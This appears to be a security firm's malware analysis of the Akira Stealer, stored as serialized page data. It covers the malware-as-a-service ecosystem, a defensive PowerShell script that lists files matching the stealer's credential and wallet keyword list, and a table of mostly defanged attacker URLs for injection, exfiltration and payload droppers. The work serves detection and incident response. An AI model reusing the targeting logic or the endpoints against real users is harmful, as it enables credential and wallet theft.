",[1928,17195,17178],{},[1911,17197,1909,17198,1909,17201,1909,17204,1909,17207,1909,17211,1909,17223,1905],{},[1928,17199,17200],{},"Input_3",[1928,17202,17203],{},"2024-03-06",[1928,17205,17206],{},"0.77089346",[1928,17208,1913,17209,1909],{},[1588,17210,17152],{"title":17151},[1928,17212,17155,17213,17216,17217,17155,17219,17222],{},[1524,17214,17215],{},"LZL3wQcSRP..."," (0.38544673, 2024-03-04)",[2016,17218],{},[1524,17220,17221],{},"M8kiBpVHG3..."," (0.38544673, 2024-03-04)\n    ",[1928,17224,17206],{},[1911,17226,1909,17227,1909,17230,1909,17232,1909,17234,1909,17238,1909,17248,1905],{"style":10717},[1928,17228,17229],{},"Input_4",[1928,17231,17203],{},[1928,17233,17206],{},[1928,17235,1913,17236,1909],{},[1588,17237,17152],{"title":17151},[1928,17239,17155,17240,17216,17243,17155,17245,17222],{},[1524,17241,17242],{},"LUFLTrqYpix...",[2016,17244],{},[1524,17246,17247],{},"La22dfH9eM...",[1928,17249,17206],{},[1541,17251],{"className":17252},[6875,6876],[1511,17254,17256],{"id":17255},"_10-inside-the-akira-ecosystem-commercialized-cybercrime-infrastructure","10. Inside the Akira Ecosystem – Commercialized Cybercrime Infrastructure",[806,17258,816],{},[806,17260,17261],{},"Akira is not just a stealer—it’s the centerpiece of a thriving underground ecosystem designed to simplify, scale, and monetize cybercrime.",[810,17263,17265],{"id":17264},"_101-a-plug-and-play-ecosystem-for-threat-actors","10.1 A Plug-and-Play Ecosystem for Threat Actors",[806,17267,1536],{},[806,17269,17270],{},"The Akira ecosystem exemplifies the evolution of cybercrime into a professionalized, service-driven economy. 
It includes:",[2738,17272,17273,17282,17288,17294,17300],{},[2741,17274,17275,17278,17279,2772],{},[1736,17276,17277],{},"Builder Bots"," for on-demand payload generation (e.g., ",[1524,17280,17281],{},"@AkiraRedBot",[2741,17283,17284,17287],{},[1736,17285,17286],{},"Telegram channels"," for updates, feature requests, and customer support",[2741,17289,17290,17293],{},[1736,17291,17292],{},"Automated licensing and payment handling",", often via direct messages or anonymous e-commerce platforms like Sellix",[2741,17295,17296,17299],{},[1736,17297,17298],{},"Bundled modules"," such as clipboard hijackers, Discord token loggers, browser data stealers, and even ransomware add-ons",[2741,17301,17302,17305],{},[1736,17303,17304],{},"Customizable payloads"," with configuration interfaces allowing toggles, webhook input, and icon branding",[806,17307,17308],{},[1449,17309],{"alt":17310,"src":17311},"Akira Stealer","https://res.cloudinary.com/c4a8/image/upload/v1749797420/blog/pics/akira-stealer-v2.jpg",[810,17313,17315],{"id":17314},"_102-commercialization-of-cybercrime","10.2 Commercialization of Cybercrime",[806,17317,1536],{},[806,17319,17320],{},"Akira's structure reflects a broader movement toward \"Malware-as-a-Service\" (MaaS), where:",[2738,17322,17323,17329,17335,17341],{},[2741,17324,17325,17328],{},[1736,17326,17327],{},"No deep technical skill"," is required to launch attacks",[2741,17330,17331,17334],{},[1736,17332,17333],{},"Low entry costs"," ($75 for 3 months, $150 for lifetime)",[2741,17336,17337,17340],{},[1736,17338,17339],{},"Instant support and documentation"," through Telegram",[2741,17342,17343,17346],{},[1736,17344,17345],{},"Community contributions"," regularly extend Akira with scripts and feature suggestions",[806,17348,17349],{},"This ecosystem mirrors legitimate SaaS business models — with changelogs, UX improvements, pricing tiers, and upsells.",[806,17351,17352],{},[1449,17353],{"alt":17354,"src":17355},"Akria 
Stealer","https://res.cloudinary.com/c4a8/image/upload/v1749797061/blog/pics/akira-stealer.jpg",[810,17357,17359],{"id":17358},"_103-beyond-the-stealer-the-ecosystems-components","10.3 Beyond the Stealer – The Ecosystem's Components",[806,17361,1536],{},[806,17363,7742,17364,17366],{},[1524,17365,6643],{}," is the heart of many attacks, the ecosystem provides a full chain:",[2738,17368,17369,17372,17375,17378,17381],{},[2741,17370,17371],{},"Obfuscation tools like PyInstaller wrappers",[2741,17373,17374],{},"File binders for coupling malicious payloads with benign software",[2741,17376,17377],{},"Compilers, crypters, and runtime polymorphism",[2741,17379,17380],{},"Hosting mirrors for payload delivery and exfiltration (e.g., GoFile, AnonFiles)",[2741,17382,17383],{},"Data management bots that summarize stolen credentials and hardware profiles",[806,17385,17386],{},[1449,17387],{"alt":17388,"src":17389},"Akira Bot","https://res.cloudinary.com/c4a8/image/upload/v1749797107/blog/pics/akira-bot.jpg",[1511,17391,17393],{"id":17392},"_11-akira-stealer-quickcheck-affected-files","11. Akira Stealer QuickCheck affected files",[806,17395,816],{},[810,17397,17399],{"id":17398},"_111-what-is-this-for","11.1 What Is This For?",[806,17401,1536],{},[806,17403,17404,17405,2289,17408,2289,17411,8210,17414,17417],{},"After a suspected Akira Stealer infection, it's critical to know immediately which files on your system were at risk of exfiltration. 
The QuickCheck PowerShell script outlined above replicates Akira's exact search logic: it scans the user's ",[1736,17406,17407],{},"Desktop",[1736,17409,17410],{},"Documents",[1736,17412,17413],{},"Downloads",[1736,17415,17416],{},"OneDrive"," folders for files that:",[2738,17419,17420,17436,17439],{},[2741,17421,17422,17423,2289,17426,2289,17429,17432,17433],{},"Contain sensitive keywords in their filename, such as ",[1524,17424,17425],{},"password",[1524,17427,17428],{},"wallet",[1524,17430,17431],{},"backup",", or ",[1524,17434,17435],{},"token",[2741,17437,17438],{},"Have specific extensions commonly targeted (.txt, .docx, .pdf, .jpg, etc.)",[2741,17440,17441],{},"Are under the 2 MB size limit imposed by the malware",[806,17443,17444,17445,17448],{},"While QuickCheck offers a rapid overview based on Akira Stealer’s internal logic, ",[1736,17446,17447],{},"it is not a substitute"," for comprehensive forensic tools or professional incident response. Always follow up with deeper analysis when dealing with confirmed breaches.",[806,17450,17451,17452,2289,17455,2289,17458,17461,17462,2786],{},"It then presents a sorted table of ",[1736,17453,17454],{},"Filename",[1736,17456,17457],{},"Relative Path",[1736,17459,17460],{},"Size (KB)"," and the ",[1736,17463,17464],{},"trigger keyword",[3587,17466,17467],{},[806,17468,17469,17472,17473,17476,17477,17479,17480,17483],{},[1736,17470,17471],{},"DISCLAIMER","\nThis tool is provided ",[1736,17474,17475],{},"“as is”"," without any warranty of completeness or fitness for a particular purpose. It does ",[1736,17478,16720],{}," guarantee detection of ",[1736,17481,17482],{},"all"," potentially sensitive files, nor does it replace full malware forensics. 
Use at your own risk.",[1541,17485],{"className":17486},[6875],[810,17488,17490],{"id":17489},"legal-notice","Legal Notice",[806,17492,1536],{},[806,17494,17495,17496,17499,17500,17503],{},"This QuickCheck Utility is intended for ",[1736,17497,17498],{},"defensive security"," assessments only. Any unauthorized scanning or usage on systems you do not own may violate privacy, copyright, or computer misuse laws. glueckkanja AG assumes ",[1736,17501,17502],{},"no liability"," for misuse or damages resulting from its use.",[810,17505,17507],{"id":17506},"powershell-script","PowerShell Script",[806,17509,1536],{},[1545,17511,17513],{"className":7708,"code":17512,"language":7710,"meta":863,"style":863},"\u003C#\n.SYNOPSIS\n    QuickCheck: Lists all files that Akira Stealer would potentially exfiltrate.\n\n.DESCRIPTION\n    Scans Desktop, Documents, Downloads and OneDrive for files that:\n      • Contain one of the defined keywords in their name\n      • Have an allowed file extension\n      • Are not larger than 2 MB\n    Presents the results in a colored, tabular overview.\n\n.NOTES\n    © glueckkanja AG – Kaiserstr. 39 · 63065 Offenbach\n#>\n\n# -------------------------------------\n# 1. Configuration\n# -------------------------------------\n$scanFolders = @(\n    \"$env:USERPROFILE\\Desktop\",\n    \"$env:USERPROFILE\\Documents\",\n    \"$env:USERPROFILE\\Downloads\",\n    \"$env:USERPROFILE\\OneDrive\"\n)\n$keywords   = 'passw','seed','mnemo','phrase','login','wallet','crypto','token','backup','secret','account'\n$extensions = '.txt','.doc','.docx','.pdf','.csv','.xls','.xlsx','.jpg','.png'\n$maxSize    = 2MB\n\n# -------------------------------------\n# 2. 
Scan and Collect Matches\n# -------------------------------------\n$matches = [System.Collections.Generic.List[PSObject]]::new()\n\nforeach ($folder in $scanFolders) {\n    if (-not (Test-Path $folder)) { continue }\n    Get-ChildItem -Path $folder -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {\n        # 2.1 Extension filter\n        if ($extensions -notcontains $_.Extension.ToLower()) { return }\n        # 2.2 Size filter\n        if ($_.Length -gt $maxSize) { return }\n\n        # 2.3 Keyword filter: explicit loop to avoid null-method calls\n        $hit = $null\n        foreach ($kw in $keywords) {\n            if ($_.Name.ToLower().Contains($kw)) {\n                $hit = $kw\n                break\n            }\n        }\n        if (-not $hit) { return }\n\n        # 2.4 Build relative path\n        $rel = $_.DirectoryName.Substring($env:USERPROFILE.Length + 1)\n\n        # 2.5 Collect\n        $matches.Add([PSCustomObject]@{\n            FileName    = $_.Name\n            Location    = $rel\n            'Size (KB)' = [math]::Round($_.Length / 1KB, 1)\n            Keyword     = $hit\n        })\n    }\n}\n\n# -------------------------------------\n# 3. Display Results\n# -------------------------------------\nclear\nWrite-Host \"🔍 glueckkanja AG – Akira Stealer QuickCheck\" -ForegroundColor Cyan\nWrite-Host \"────────────────────────────────────────────────────────\" -ForegroundColor DarkCyan\n\nif ($matches.Count -gt 0) {\n    $matches |\n        Sort-Object Location, FileName |\n        Format-Table -AutoSize `\n            @{Label='File';       Expression={$_.FileName}},\n            @{Label='Location';   Expression={$_.Location}},\n            @{Label='Size (KB)';  Expression={$_. 
'Size (KB)'}},\n            @{Label='Keyword';    Expression={$_.Keyword}}\n\n    Write-Host \"`n⚠️  Total potential matches: $($matches.Count)\" -ForegroundColor Yellow\n}\nelse {\n    Write-Host \"✅ No potentially compromised files found.\" -ForegroundColor Green\n}\n\nWrite-Host \"`n© glueckkanja AG · Kaiserstr. 39 · 63065 Offenbach\" -ForegroundColor DarkGray\nWrite-Host \"Disclaimer: This tool offers a high-level scan based on Akira Stealer’s logic; it does not replace full forensic analysis.\" -ForegroundColor DarkGray\n",[1524,17514,17515,17520,17525,17530,17534,17539,17544,17549,17554,17559,17564,17568,17573,17578,17583,17587,17592,17597,17601,17606,17611,17616,17621,17626,17630,17635,17640,17645,17649,17653,17658,17662,17667,17671,17676,17681,17686,17691,17696,17701,17706,17710,17715,17720,17725,17730,17735,17740,17745,17750,17755,17759,17764,17769,17773,17778,17783,17788,17793,17798,17803,17808,17813,17817,17821,17825,17830,17834,17839,17844,17849,17853,17858,17863,17868,17873,17878,17883,17888,17894,17899,17905,17910,17916,17922,17927,17932,17938],{"__ignoreMap":863},[1588,17516,17517],{"class":1590,"line":1591},[1588,17518,17519],{},"\u003C#\n",[1588,17521,17522],{"class":1590,"line":864},[1588,17523,17524],{},".SYNOPSIS\n",[1588,17526,17527],{"class":1590,"line":1814},[1588,17528,17529],{},"    QuickCheck: Lists all files that Akira Stealer would potentially exfiltrate.\n",[1588,17531,17532],{"class":1590,"line":1831},[1588,17533,9865],{"emptyLinePlaceholder":508},[1588,17535,17536],{"class":1590,"line":2135},[1588,17537,17538],{},".DESCRIPTION\n",[1588,17540,17541],{"class":1590,"line":2141},[1588,17542,17543],{},"    Scans Desktop, Documents, Downloads and OneDrive for files that:\n",[1588,17545,17546],{"class":1590,"line":2147},[1588,17547,17548],{},"      • Contain one of the defined keywords in their name\n",[1588,17550,17551],{"class":1590,"line":2153},[1588,17552,17553],{},"      • Have an allowed file 
extension\n",[1588,17555,17556],{"class":1590,"line":2159},[1588,17557,17558],{},"      • Are not larger than 2 MB\n",[1588,17560,17561],{"class":1590,"line":2165},[1588,17562,17563],{},"    Presents the results in a colored, tabular overview.\n",[1588,17565,17566],{"class":1590,"line":11039},[1588,17567,9865],{"emptyLinePlaceholder":508},[1588,17569,17570],{"class":1590,"line":11045},[1588,17571,17572],{},".NOTES\n",[1588,17574,17575],{"class":1590,"line":11051},[1588,17576,17577],{},"    © glueckkanja AG – Kaiserstr. 39 · 63065 Offenbach\n",[1588,17579,17580],{"class":1590,"line":11057},[1588,17581,17582],{},"#>\n",[1588,17584,17585],{"class":1590,"line":11063},[1588,17586,9865],{"emptyLinePlaceholder":508},[1588,17588,17589],{"class":1590,"line":11069},[1588,17590,17591],{},"# -------------------------------------\n",[1588,17593,17594],{"class":1590,"line":11075},[1588,17595,17596],{},"# 1. Configuration\n",[1588,17598,17599],{"class":1590,"line":11081},[1588,17600,17591],{},[1588,17602,17603],{"class":1590,"line":11087},[1588,17604,17605],{},"$scanFolders = @(\n",[1588,17607,17608],{"class":1590,"line":11093},[1588,17609,17610],{},"    \"$env:USERPROFILE\\Desktop\",\n",[1588,17612,17613],{"class":1590,"line":11099},[1588,17614,17615],{},"    \"$env:USERPROFILE\\Documents\",\n",[1588,17617,17618],{"class":1590,"line":11105},[1588,17619,17620],{},"    \"$env:USERPROFILE\\Downloads\",\n",[1588,17622,17623],{"class":1590,"line":11111},[1588,17624,17625],{},"    \"$env:USERPROFILE\\OneDrive\"\n",[1588,17627,17628],{"class":1590,"line":11117},[1588,17629,11258],{},[1588,17631,17632],{"class":1590,"line":11123},[1588,17633,17634],{},"$keywords   = 'passw','seed','mnemo','phrase','login','wallet','crypto','token','backup','secret','account'\n",[1588,17636,17637],{"class":1590,"line":11790},[1588,17638,17639],{},"$extensions = 
'.txt','.doc','.docx','.pdf','.csv','.xls','.xlsx','.jpg','.png'\n",[1588,17641,17642],{"class":1590,"line":11795},[1588,17643,17644],{},"$maxSize    = 2MB\n",[1588,17646,17647],{"class":1590,"line":11800},[1588,17648,9865],{"emptyLinePlaceholder":508},[1588,17650,17651],{"class":1590,"line":11805},[1588,17652,17591],{},[1588,17654,17655],{"class":1590,"line":11811},[1588,17656,17657],{},"# 2. Scan and Collect Matches\n",[1588,17659,17660],{"class":1590,"line":11816},[1588,17661,17591],{},[1588,17663,17664],{"class":1590,"line":11821},[1588,17665,17666],{},"$matches = [System.Collections.Generic.List[PSObject]]::new()\n",[1588,17668,17669],{"class":1590,"line":11826},[1588,17670,9865],{"emptyLinePlaceholder":508},[1588,17672,17673],{"class":1590,"line":11831},[1588,17674,17675],{},"foreach ($folder in $scanFolders) {\n",[1588,17677,17678],{"class":1590,"line":11836},[1588,17679,17680],{},"    if (-not (Test-Path $folder)) { continue }\n",[1588,17682,17683],{"class":1590,"line":11841},[1588,17684,17685],{},"    Get-ChildItem -Path $folder -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {\n",[1588,17687,17688],{"class":1590,"line":11847},[1588,17689,17690],{},"        # 2.1 Extension filter\n",[1588,17692,17693],{"class":1590,"line":11853},[1588,17694,17695],{},"        if ($extensions -notcontains $_.Extension.ToLower()) { return }\n",[1588,17697,17698],{"class":1590,"line":11859},[1588,17699,17700],{},"        # 2.2 Size filter\n",[1588,17702,17703],{"class":1590,"line":11864},[1588,17704,17705],{},"        if ($_.Length -gt $maxSize) { return }\n",[1588,17707,17708],{"class":1590,"line":11869},[1588,17709,9865],{"emptyLinePlaceholder":508},[1588,17711,17712],{"class":1590,"line":11874},[1588,17713,17714],{},"        # 2.3 Keyword filter: explicit loop to avoid null-method calls\n",[1588,17716,17717],{"class":1590,"line":11879},[1588,17718,17719],{},"        $hit = $null\n",[1588,17721,17722],{"class":1590,"line":11885},[1588,17723,17724],{},"        
foreach ($kw in $keywords) {\n",[1588,17726,17727],{"class":1590,"line":11890},[1588,17728,17729],{},"            if ($_.Name.ToLower().Contains($kw)) {\n",[1588,17731,17732],{"class":1590,"line":11895},[1588,17733,17734],{},"                $hit = $kw\n",[1588,17736,17737],{"class":1590,"line":11900},[1588,17738,17739],{},"                break\n",[1588,17741,17742],{"class":1590,"line":11905},[1588,17743,17744],{},"            }\n",[1588,17746,17747],{"class":1590,"line":11910},[1588,17748,17749],{},"        }\n",[1588,17751,17752],{"class":1590,"line":11915},[1588,17753,17754],{},"        if (-not $hit) { return }\n",[1588,17756,17757],{"class":1590,"line":11921},[1588,17758,9865],{"emptyLinePlaceholder":508},[1588,17760,17761],{"class":1590,"line":11927},[1588,17762,17763],{},"        # 2.4 Build relative path\n",[1588,17765,17766],{"class":1590,"line":11933},[1588,17767,17768],{},"        $rel = $_.DirectoryName.Substring($env:USERPROFILE.Length + 1)\n",[1588,17770,17771],{"class":1590,"line":11939},[1588,17772,9865],{"emptyLinePlaceholder":508},[1588,17774,17775],{"class":1590,"line":11944},[1588,17776,17777],{},"        # 2.5 Collect\n",[1588,17779,17780],{"class":1590,"line":11949},[1588,17781,17782],{},"        $matches.Add([PSCustomObject]@{\n",[1588,17784,17785],{"class":1590,"line":11955},[1588,17786,17787],{},"            FileName    = $_.Name\n",[1588,17789,17790],{"class":1590,"line":11961},[1588,17791,17792],{},"            Location    = $rel\n",[1588,17794,17795],{"class":1590,"line":11967},[1588,17796,17797],{},"            'Size (KB)' = [math]::Round($_.Length / 1KB, 1)\n",[1588,17799,17800],{"class":1590,"line":11973},[1588,17801,17802],{},"            Keyword     = $hit\n",[1588,17804,17805],{"class":1590,"line":11978},[1588,17806,17807],{},"        })\n",[1588,17809,17810],{"class":1590,"line":11983},[1588,17811,17812],{},"    
}\n",[1588,17814,17815],{"class":1590,"line":11989},[1588,17816,8430],{},[1588,17818,17819],{"class":1590,"line":11994},[1588,17820,9865],{"emptyLinePlaceholder":508},[1588,17822,17823],{"class":1590,"line":11999},[1588,17824,17591],{},[1588,17826,17827],{"class":1590,"line":12005},[1588,17828,17829],{},"# 3. Display Results\n",[1588,17831,17832],{"class":1590,"line":12011},[1588,17833,17591],{},[1588,17835,17836],{"class":1590,"line":12017},[1588,17837,17838],{},"clear\n",[1588,17840,17841],{"class":1590,"line":12022},[1588,17842,17843],{},"Write-Host \"🔍 glueckkanja AG – Akira Stealer QuickCheck\" -ForegroundColor Cyan\n",[1588,17845,17846],{"class":1590,"line":12028},[1588,17847,17848],{},"Write-Host \"────────────────────────────────────────────────────────\" -ForegroundColor DarkCyan\n",[1588,17850,17851],{"class":1590,"line":12034},[1588,17852,9865],{"emptyLinePlaceholder":508},[1588,17854,17855],{"class":1590,"line":12039},[1588,17856,17857],{},"if ($matches.Count -gt 0) {\n",[1588,17859,17860],{"class":1590,"line":12045},[1588,17861,17862],{},"    $matches |\n",[1588,17864,17865],{"class":1590,"line":12051},[1588,17866,17867],{},"        Sort-Object Location, FileName |\n",[1588,17869,17870],{"class":1590,"line":12056},[1588,17871,17872],{},"        Format-Table -AutoSize `\n",[1588,17874,17875],{"class":1590,"line":12061},[1588,17876,17877],{},"            @{Label='File';       Expression={$_.FileName}},\n",[1588,17879,17880],{"class":1590,"line":12066},[1588,17881,17882],{},"            @{Label='Location';   Expression={$_.Location}},\n",[1588,17884,17885],{"class":1590,"line":12072},[1588,17886,17887],{},"            @{Label='Size (KB)';  Expression={$_. 
'Size (KB)'}},\n",[1588,17889,17891],{"class":1590,"line":17890},79,[1588,17892,17893],{},"            @{Label='Keyword';    Expression={$_.Keyword}}\n",[1588,17895,17897],{"class":1590,"line":17896},80,[1588,17898,9865],{"emptyLinePlaceholder":508},[1588,17900,17902],{"class":1590,"line":17901},81,[1588,17903,17904],{},"    Write-Host \"`n⚠️  Total potential matches: $($matches.Count)\" -ForegroundColor Yellow\n",[1588,17906,17908],{"class":1590,"line":17907},82,[1588,17909,8430],{},[1588,17911,17913],{"class":1590,"line":17912},83,[1588,17914,17915],{},"else {\n",[1588,17917,17919],{"class":1590,"line":17918},84,[1588,17920,17921],{},"    Write-Host \"✅ No potentially compromised files found.\" -ForegroundColor Green\n",[1588,17923,17925],{"class":1590,"line":17924},85,[1588,17926,8430],{},[1588,17928,17930],{"class":1590,"line":17929},86,[1588,17931,9865],{"emptyLinePlaceholder":508},[1588,17933,17935],{"class":1590,"line":17934},87,[1588,17936,17937],{},"Write-Host \"`n© glueckkanja AG · Kaiserstr. 39 · 63065 Offenbach\" -ForegroundColor DarkGray\n",[1588,17939,17941],{"class":1590,"line":17940},88,[1588,17942,17943],{},"Write-Host \"Disclaimer: This tool offers a high-level scan based on Akira Stealer’s logic; it does not replace full forensic analysis.\" -ForegroundColor DarkGray\n",[1541,17945],{"className":17946},[6875,6876],[1511,17948,17950],{"id":17949},"_12-beyond-response-how-glueckkanja-csoc-turns-incidents-into-insights","12. Beyond Response – How glueckkanja CSOC Turns Incidents into Insights",[806,17952,816],{},[806,17954,17955,17956],{},"Most security operations centers stop at containment.\n",[1736,17957,17958],{},"We don’t.",[806,17960,17961],{},"At glueckkanja CSOC, we believe incident response isn’t the finish line—it’s the starting point.",[806,17963,17964],{},"When others declare victory and move on, we dive deeper. For us, each incident is an opportunity to learn, adapt, and become stronger. 
Our relentless curiosity, fueled by years of deep forensic expertise and reverse engineering capability, ensures we don’t just defend—we anticipate.",[806,17966,17967,17968,2786],{},"This philosophy is why we built the ",[1736,17969,17970],{},"Akira Compromise Reporter",[806,17972,17973],{},"Far beyond basic detection, this internally developed forensic tool uses our intimate knowledge of the Akira Stealer to provide absolute clarity on what data has been compromised. Within minutes, it produces a precise, actionable snapshot of the incident's full impact:",[2738,17975,17976,17979,17982],{},[2741,17977,17978],{},"Exactly which credentials, tokens, and browser sessions were stolen.",[2741,17980,17981],{},"Precisely which cryptocurrency wallets, messaging accounts, and files were exposed.",[2741,17983,17984],{},"A clear, structured, and detailed forensic report—transforming uncertainty into immediate, informed action.",[806,17986,17987],{},[1449,17988],{"alt":17989,"src":17990},"Akira Compromise Report","https://res.cloudinary.com/c4a8/image/upload/v1749796758/blog/pics/akira-compromise-report.png",[806,17992,17993],{},"Because at glueckkanja, we measure our success not just by threats blocked, but by clarity provided. ybersecurity, done right, isn’t about simply reacting to incidents—It’s about understanding, adapting, and always staying one step ahead.",[806,17995,17996],{},[1736,17997,17998],{},"That’s the glueckkanja CSOC difference.",[1511,18000,18002],{"id":18001},"_13-indicators-of-compromise-iocs","13. Indicators of Compromise (IOCs)",[806,18004,816],{},[806,18006,18007],{},"Below is a comprehensive, verbatim collection of IOCs extracted directly from the malware code during our internal reverse engineering process at glueckkanja CSOC. No assumptions or external threat intel sources were used — all indicators are confirmed findings. 
All URLs are deliberately obfuscated to prevent accidental clicks.",[806,18009,18010],{},[1736,18011,18012],{},"Abbreviations:",[2738,18014,18015,18021],{},[2741,18016,18017,18020],{},[1736,18018,18019],{},"TG:"," Telegram reporting channel",[2741,18022,18023,18026],{},[1736,18024,18025],{},"Alt:"," Alternate (fallback) endpoint",[810,18028,18030],{"id":18029},"_1-domains-urls","1. Domains & URLs",[806,18032,1536],{},[1902,18034,1905,18036],{"className":18035,"style":10692},[17110],[1923,18037,18038,1905,18050,1905,18063,1905,18076,1905,18089,1905,18102,1905,18115,1905,18128,1905,18144,1905,18160,1905,18173,1905,18186,1905,18199,1905,18212,1905,18225,1905,18238,1905,18251,1905,18264,1905,18277,1905,18290,1905,18304,1905,18317],{},[1911,18039,1909,18040,1909,18044,1909,18048,1905],{},[1915,18041,18043],{"style":18042},"text-align: left; width: 18%;","Category",[1915,18045,18047],{"style":18046},"text-align: left; width: 52%;","Obfuscated URL",[1915,18049,10868],{"style":10861},[1911,18051,1909,18052,1909,18055,1909,18060,1905],{},[1928,18053,18054],{},"Primary Injection",[1928,18056,18057],{},[1524,18058,18059],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/inj[.]php",[1928,18061,18062],{},"Initial attacker webhook endpoint",[1911,18064,1909,18065,1909,18068,1909,18073,1905],{"style":10717},[1928,18066,18067],{},"Fallback Injection",[1928,18069,18070],{},[1524,18071,18072],{},"https[:]//cosmoplanets[.]net/.well-known/pki-validation/inj[.]php",[1928,18074,18075],{},"Alternate injector endpoint",[1911,18077,1909,18078,1909,18081,1909,18086,1905],{},[1928,18079,18080],{},"Error Reporting (TG)",[1928,18082,18083],{},[1524,18084,18085],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/link[.]php",[1928,18087,18088],{},"Telegram error/log reporting URL",[1911,18090,1909,18091,1909,18094,1909,18099,1905],{"style":10717},[1928,18092,18093],{},"Error Reporting 
(Alt)",[1928,18095,18096],{},[1524,18097,18098],{},"https[:]//cosmoplanets[.]net/.well-known/pki-validation/link[.]php",[1928,18100,18101],{},"Alternate error/log reporting URL",[1911,18103,1909,18104,1909,18107,1909,18112,1905],{},[1928,18105,18106],{},"Vanity Bot (TG)",[1928,18108,18109],{},[1524,18110,18111],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/mumu[.]php",[1928,18113,18114],{},"Vanity address notification endpoint",[1911,18116,1909,18117,1909,18120,1909,18125,1905],{"style":10717},[1928,18118,18119],{},"Vanity Bot (Alt)",[1928,18121,18122],{},[1524,18123,18124],{},"https[:]//cosmoplanets[.]net/well-known/pki-validation/mumu[.]php",[1928,18126,18127],{},"Alternate vanity notification endpoint",[1911,18129,1909,18130,1909,18133,1909,18138,1905],{},[1928,18131,18132],{},"Exodus Injection",[1928,18134,18135],{},[1524,18136,18137],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/exodus[.]asar",[1928,18139,18140,18141,18143],{},"Electron ",[1524,18142,10598],{}," app module",[1911,18145,1909,18146,1909,18149,1909,18154,1905],{"style":10717},[1928,18147,18148],{},"Atomic Injection",[1928,18150,18151],{},[1524,18152,18153],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/atomic[.]asar",[1928,18155,18140,18156,18159],{},[1524,18157,18158],{},"AtomicWallet"," module",[1911,18161,1909,18162,1909,18165,1909,18170,1905],{},[1928,18163,18164],{},"Updater Download",[1928,18166,18167],{},[1524,18168,18169],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/Updater[.]exe",[1928,18171,18172],{},"Persistence dropper executable",[1911,18174,1909,18175,1909,18178,1909,18183,1905],{"style":10717},[1928,18176,18177],{},"Gofile API List",[1928,18179,18180],{},[1524,18181,18182],{},"https[:]//api.gofile[.]io/servers",[1928,18184,18185],{},"Retrieves best GoFile upload server",[1911,18187,1909,18188,1909,18191,1909,18196,1905],{},[1928,18189,18190],{},"Discord Token 
Check",[1928,18192,18193],{},[1524,18194,18195],{},"https[:]//discordapp[.]com/api/v9/users/@me",[1928,18197,18198],{},"Validates stolen Discord token",[1911,18200,1909,18201,1909,18204,1909,18209,1905],{"style":10717},[1928,18202,18203],{},"Discord Billing Info",[1928,18205,18206],{},[1524,18207,18208],{},"https[:]//discord[.]com/api/users/@me/billing/payment-sources",[1928,18210,18211],{},"Retrieves billing methods",[1911,18213,1909,18214,1909,18217,1909,18222,1905],{},[1928,18215,18216],{},"Google OAuth Replay",[1928,18218,18219],{},[1524,18220,18221],{},"https[:]//accounts[.]google[.]com/oauth/multilogin",[1928,18223,18224],{},"Replays stolen Google session tokens",[1911,18226,1909,18227,1909,18230,1909,18235,1905],{"style":10717},[1928,18228,18229],{},"IP Check (hosting)",[1928,18231,18232],{},[1524,18233,18234],{},"http[:]//ip-api[.]com/line/?fields=hosting",[1928,18236,18237],{},"Hosting environment detection",[1911,18239,1909,18240,1909,18243,1909,18248,1905],{},[1928,18241,18242],{},"IP Lookup (geo)",[1928,18244,18245],{},[1524,18246,18247],{},"http[:]//ip-api[.]com/json/{ip}",[1928,18249,18250],{},"Geolocation by IP",[1911,18252,1909,18253,1909,18256,1909,18261,1905],{"style":10717},[1928,18254,18255],{},"Public IP Retrieval",[1928,18257,18258],{},[1524,18259,18260],{},"https[:]//api[.]ipify[.]org",[1928,18262,18263],{},"Fetches external IP address",[1911,18265,1909,18266,1909,18269,1909,18274,1905],{},[1928,18267,18268],{},"File.io Upload",[1928,18270,18271],{},[1524,18272,18273],{},"https[:]//file[.]io/",[1928,18275,18276],{},"Secondary exfiltration channel",[1911,18278,1909,18279,1909,18282,1909,18287,1905],{"style":10717},[1928,18280,18281],{},"Oshi.at Upload",[1928,18283,18284],{},[1524,18285,18286],{},"http[:]//oshi[.]at/",[1928,18288,18289],{},"Tertiary exfiltration channel",[1911,18291,1909,18292,1909,18295,1909,18301,1905],{},[1928,18293,18294],{},"JS Dropper 
Primary",[1928,18296,18297],{},[833,18298,18300],{"href":18299,"target":513},"https://rentry.co/7vzd22fg36hfdd33/raw","https[:]//rentry[.]co/7vzd22fg36hfdd33/raw",[1928,18302,18303],{},"Remote reference to actual ZIP URL",[1911,18305,1909,18306,1909,18309,1909,18314,1905],{"style":10717},[1928,18307,18308],{},"JS Dropper Fallback 1",[1928,18310,18311],{},[833,18312,18313],{"href":9614,"target":513},"https[:]//cosmicdust[.]zip/.well-known/pki-validation/pyth.zip",[1928,18315,18316],{},"Alternative payload ZIP",[1911,18318,1909,18319,1909,18322,1909,18327,1905],{},[1928,18320,18321],{},"JS Dropper Fallback 2",[1928,18323,18324],{},[833,18325,18326],{"href":9619,"target":513},"https[:]//cosmoplanets[.]net/well-known/pki-validation/pyth.zip",[1928,18328,18329],{},"Secondary fallback payload ZIP",[1541,18331],{"className":18332},[6875,6876],[810,18334,18336],{"id":18335},"_2-cryptocurrency-addresses","2. Cryptocurrency 